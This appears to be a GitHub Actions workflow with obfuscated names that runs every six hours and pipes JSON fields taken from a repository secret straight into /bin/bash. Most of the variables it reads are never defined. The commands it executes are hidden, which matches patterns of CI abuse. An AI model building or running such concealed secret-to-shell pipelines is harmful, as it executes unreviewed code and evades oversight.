name: chenliehui7815

on:
  workflow_dispatch:
  schedule:
    - cron: '35 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: chenliehui7815
        env:
          ycoc310: ${{ secrets.ycoc310 }}
        run: |
          echo $ycoc310 | jq -r .nzegt69 | /bin/bash
          echo $idjx14 | jq -r .kaijh30 | /bin/bash
          echo $jhx87905 | jq -r .wp75 | /bin/bash
          echo $dk89263 | jq -r .dln6569 | /bin/bash
          echo $papc016 | jq -r .zw91997 | /bin/bash
          echo $slky1795 | jq -r .tzcgv2 | /bin/bash
          echo $ste08 | jq -r .yp77533 | /bin/bash

